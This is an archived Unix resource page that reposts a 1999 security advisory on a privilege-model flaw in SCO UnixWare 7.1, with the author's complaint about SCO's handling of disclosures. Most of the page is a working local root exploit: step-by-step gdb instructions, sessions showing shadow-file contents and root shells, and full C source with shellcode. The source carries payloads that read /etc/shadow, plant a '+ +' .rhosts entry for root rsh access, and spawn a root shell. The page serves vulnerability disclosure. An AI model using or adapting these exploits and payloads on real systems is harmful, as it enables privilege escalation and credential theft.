Get APLawrence.com by RSS(OLDER) <- More Stuff -> (NEWER) (NEWEST)
Home > News Posts > sco security ––>Fundamental flaw in UnixWare 7 security
Printer Friendly Version
News Group Posts
sco security
This is a detailed example of a security flaw that was found in the original Unixware 7.
I assume this has been long fixed, but note the frustration from SCO's "not to worry" reaction.
From: Vacuum [mailto:vacuum@technotronic.com]
Sent: Friday, December 10, 1999 2:35 PM
Subject: Fundamental flaw in UnixWare 7 security
Greetings,
OVERVIEW
A flaw in SCO UnixWare's security model will allow any user to gain root, read
system files, etc.
RANT
I'm sure many of you are wondering what the response from the people from
SCO has been regarding all of these UnixWare problems. Nil. First, a little
background. Back when I began my UnixWare audit with the dos7utils exploit,
I was contacted and asked to please submit any bugs I find to the UnixWare
security team. Of course I had no problem with this, since my goal is
supposedly the same as theirs: to secure UnixWare. I immediately submitted
my su and uidadmin exploits and told then about the gethostbyname() overflow.
I was told that these were "known" bugs (known, evidently, to SCO only) and
nothing more.
I foolishly assumed that this meant they were working on a fix but did not
have one ready. It turns out that what they meant by this was "We have a
fix ready, but we are going to sit on it until it becomes public." SCO had
completely abused my decision to submit to them then wait for a fix. Anyone
notice how quickly they got out the gethostbyname(), su and uidadmin fixes
but have yet to fix the other problems I've found but didn't tell them about?
Chances are excellent that if I had never posted these exploits, crackers
would've continued exploiting UnixWare until SCO silently fixed the problems
in 7.2.
Wake up, SCO! The underground cracker community is already exploiting all
the problems I'm finding! You're only hurting your customers by waiting until
the next release, or until someone posts publicly. Take a proactive stance on
security by finding problems internally (or with the help of people like me)
and then tell the world at large. To assume that you
and I are the only ones capable of finding these holes is an insult to your
customers.
I've yet to recieve a word from SCO about my recent slew of exploits. My
guess is that they were just happy to buy a few months of time before I
started posting.
BACKGROUND
Please read my "uidadmin + discussion" advisory for more information about
UnixWare's privileged process system. The techniques discussed herein have
only been tested on SCO UnixWare 7.1. While earlier versions of UW are
probably affected, SCO OpenServer does not use this particular security
model and are therefore not affected.
DETAILS
As Aleph One put it, in his response to my Vuln-Dev post:
...
SCO has implemented privileges in UnixWare without thinking of possible
interaction with other subsystems. They should have placed the same
restriction on application running with privileges as those placed on
applications running suid or sgid. I am surprised no one before noticed
this. Its a hole you could drive a truck through. The engineers that coded
the privilege system (a security subsystem!) should get a good ass chewing
or get fired.
...
Indeed this is true. This security subsystem *itself*, not the programs
encompassed by it, has cause more compromises than all the problems I found
in the suid/sgids. Consider that a privileged program which is simply
void main() {
printf("sekure\n");
}
can be compromised just as readily one which is 10000 lines of spaghetti
code. The specific problem lies in the fact that any user who runs one of these
privileged processes (that are not suid/sgid, but are in
/etc/security/tcb/privs) has full control over the process. By
using a debugger, we can stop the program, insert registers and control
program flow. Any program in the privs file which is not also suid/sgid is
vulnerable to this exploit, regardless of whatever overflows and symlink
vulnerabilities may or may not exist.
EXPLOIT
The exploit goes like this:
- Put nops+shellcode into your environment
- load a program which gains privs in /etc/security/tcb/privs with gdb
- set a breakpoint at _init
- run, and when we hit that breakpoint change our eip to point into our
environment
- continue, continue, rootshell
Get GDB for UnixWare binaries from ftp.freebird.org
Thanks to the teso folks for their suggestions.
----- DACREAD -----
bash-2.02$ ./truck 1
UnixWare 7.1 security model exploit
Brock Tellier btellier@usa.net
$ ./gdb /usr/ucb/w
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (unixware2), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) break _init
Breakpoint 1 at 0x804ac34
(gdb) run
Starting program: /usr/ucb/w
Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to process 3257]
warning: shared library handler failed to enable breakpoint
Breakpoint 1, 0x804ac34 in _init ()
(gdb) disassemble
Dump of assembler code for function _init:
0x804ac34 <_init>: ret
End of assembler dump.
(gdb) info registers
eax 0x0 0
ecx 0x8 8
edx 0x804ac38 134523960
ebx 0x804644c 134505548
esp 0x804643c 134505532
ebp 0x8046440 134505536
esi 0x804bc3c 134528060
edi 0x8046454 134505556
eip 0x804ac34 134523956
eflags 0x100212 1049106
cs 0x17 23
ss 0x1f 31
ds 0x1f 31
es 0x1f 31
fs 0x0 0
gs 0x0 0
(gdb) set $eip = 0x8046b75
(gdb) continue
Continuing.
Program received signal SIGTRAP, Trace/breakpoint trap.
Cannot remove breakpoints because program is no longer writable.
It might be running in another process.
Further execution is probably impossible.
0xbff99a40 in errno ()
(gdb) continue
Continuing.
root:bahbapXFxhypF:10935::::::
daemon:NP:6445::::::
bin:NP:6445::::::
....
Program exited normally.
(gdb)
---- DACWRITE ----
bash-2.02$ ./truck 2
UnixWare 7.1 security model exploit
Brock Tellier btellier@usa.net
$ ./gdb /usr/bin/getdev
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (unixware2), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) break _init
Breakpoint 1 at 0x830e740
(gdb) run
Starting program: /usr/bin/getdev
Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to process 3271]
warning: shared library handler failed to enable breakpoint
Breakpoint 1, 0x830e740 in _init ()
(gdb) disassembe
Undefined command: "disassembe". Try "help".
(gdb) disassemble
Dump of assembler code for function _init:
0x830e740 <_init>: ret
End of assembler dump.
(gdb) set $eip = 0x8046b75
(gdb) continue
Continuing.
Program received signal SIGTRAP, Trace/breakpoint trap.
Cannot remove breakpoints because program is no longer writable.
It might be running in another process.
Further execution is probably impossible.
0xbff99a40 in errno ()
(gdb) continue
Continuing.
# id
uid=0(root) gid=3(sys)
groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit)
,10(nuucp),12(da
emon),23(cron),25(dtadmin),47(priv),9(lp)
#
---- SETUID ----
bash-2.02$ ./truck 3
UnixWare 7.1 security model exploit
Brock Tellier btellier@usa.net
$ ./gdb /usr/ucb/lpr
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (unixware2), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) break _init
Breakpoint 1 at 0x805036c
(gdb) run
Starting program: /usr/ucb/lpr
Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to process 3302]
warning: shared library handler failed to enable breakpoint
Breakpoint 1, 0x805036c in _init ()
(gdb) disassemble
Dump of assembler code for function _init:
0x805036c <_init>: ret
End of assembler dump.
(gdb) set $eip = 0x8046b75
(gdb) continue
Continuing.
Program received signal SIGTRAP, Trace/breakpoint trap.
Cannot remove breakpoints because program is no longer writable.
It might be running in another process.
Further execution is probably impossible.
0xbff99a40 in errno ()
(gdb) continue
Continuing.
# id
uid=0(root) gid=1(other)
groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit)
,10(nuucp),12(da
emon),23(cron),25(dtadmin),47(priv),9(lp)
#
--- truck.c ---
/**
** "Its a hole you could drive a truck through."
** -Aleph One
**
** truck.c UnixWare 7.1 security model exploit
** Demonstrates how we own privileged processes
**
** Usage: cc -o truck truck.c
** ./truck <filetype> where filetype is 1, 2 or 3
** (for dacread, dacwrite and setuid, respectively)
**
** This will put $XNEC in the environment and run a shell.
** From there you must use gdb/debug to load a file of the
** type you chose (by checking /etc/security/tcb/privs)
** and setting a breakpoint at _init via "break _init".
** When you "run" and break at _init, change your EIP
** to something between 0x8046000 and 0x8048000 with
** "set $eip = 0x8046b75" and "continue" twice.
**
**
** Brock Tellier btellier@usa.net
**/
#include <stdlib.h>
#include <stdio.h>
char scoshell[]= /* This isn't a buffer overflow! really! */
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/tmp/sm\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
#define LEN 3500
#define NOP 0x90
#define DACWRITE "void main() { system(\"echo + + > /.rhosts; chmod 700 \
/.rhosts; chown root:sys /.rhosts; rsh -l root localhost sh -i \
\"); }\n"
#define DACREAD "void main() { system(\"cat /etc/shadow\");}\n"
#define SETUID "void main() { setreuid(0,0);system(\"/bin/sh\"); }\n"
void usage(int ftype) {
fprintf(stderr, "Error: Usage: truck [filetype]\n");
fprintf(stderr, "Where filetype is one of the following: \n");
fprintf(stderr, "1 dacread\n2 dacwrite\n3 setuid\n");
fprintf(stderr, "Note: if file has allprivs, use setuid\n");
}
void buildsm(int ftype) {
FILE *fp;
char cc[100];
fp = fopen("/tmp/sm.c", "w");
if (ftype == 1) fprintf(fp, DACREAD);
else if(ftype == 2) fprintf(fp, DACWRITE);
else if(ftype == 3) fprintf(fp, SETUID);
fclose(fp);
snprintf(cc, sizeof(cc), "cc -o /tmp/sm /tmp/sm.c");
system(cc);
}
int main(int argc, char *argv[]) {
int i;
int buflen = LEN;
char buf[LEN];
int filetype = 0;
char filebuf[20];
if(argc > 2 || argc == 1) {
usage(filetype);
exit(0);
}
if ( argc > 1 ) filetype=atoi(argv[1]);
if ( filetype > 3 || filetype < 1 ) { usage(filetype); exit(-1); }
buildsm(filetype);
fprintf(stderr, "\nUnixWare 7.1 security model exploit\n");
fprintf(stderr, "Brock Tellier btellier@usa.net\n\n");
memset(buf,NOP,buflen);
memcpy(buf+(buflen - strlen(scoshell) - 1),scoshell,strlen(scoshell));
memcpy(buf, "XNEC=", 5);
putenv(buf);
buf[buflen - 1] = 0;
system("/bin/sh");
exit(0);
}
------
Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellier@usa.net
____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1
If this page was useful to you, please click to help others find it:
Your +1's can help friends, contacts, and others on the web find the best stuff when they search.
More Articles by Tony Lawrence
Have you tried Searching this site?
Unix/Linux/Mac OS X support by phone, email or on-site: Support Rates
This is a Unix/Linux resource website. It contains technical articles about Unix, Linux and general computing related subjects, opinion, news, help files, how-to's, tutorials and more. We appreciate comments and article submissions.
Many of the products and books I review are things I purchased for my own use. Some were given to me specifically for the purpose of reviewing them. I resell or can earn commissions from the sale of some of these items. Links within these pages may be affiliate links that pay me for referring you to them. That's mostly insignificant amounts of money; whenever it is not I have made my relationship plain. I also may own stock in companies mentioned here. If you have any question, please do feel free to contact me.
Specific links that take you to pages that allow you to purchase the item I reviewed are very likely to pay me a commission. Many of the books I review were given to me by the publishers specifically for the purpose of writing a review. These gifts and referral fees do not affect my opinions; I often give bad reviews anyway.
We use Google third-party advertising companies to serve ads when you visit our website. These companies may use information (not including your name, address, email address, or telephone number) about your visits to this and other websites in order to provide advertisements about goods and services of interest to you. If you would like more information about this practice and to know your choices about not having this information used by these companies, click here.
Click here to add your comments
Don't miss responses! Subscribe to Comments by RSS or by Email
Click here to add your comments
If you want a picture to show with your comment, go get a Gravatar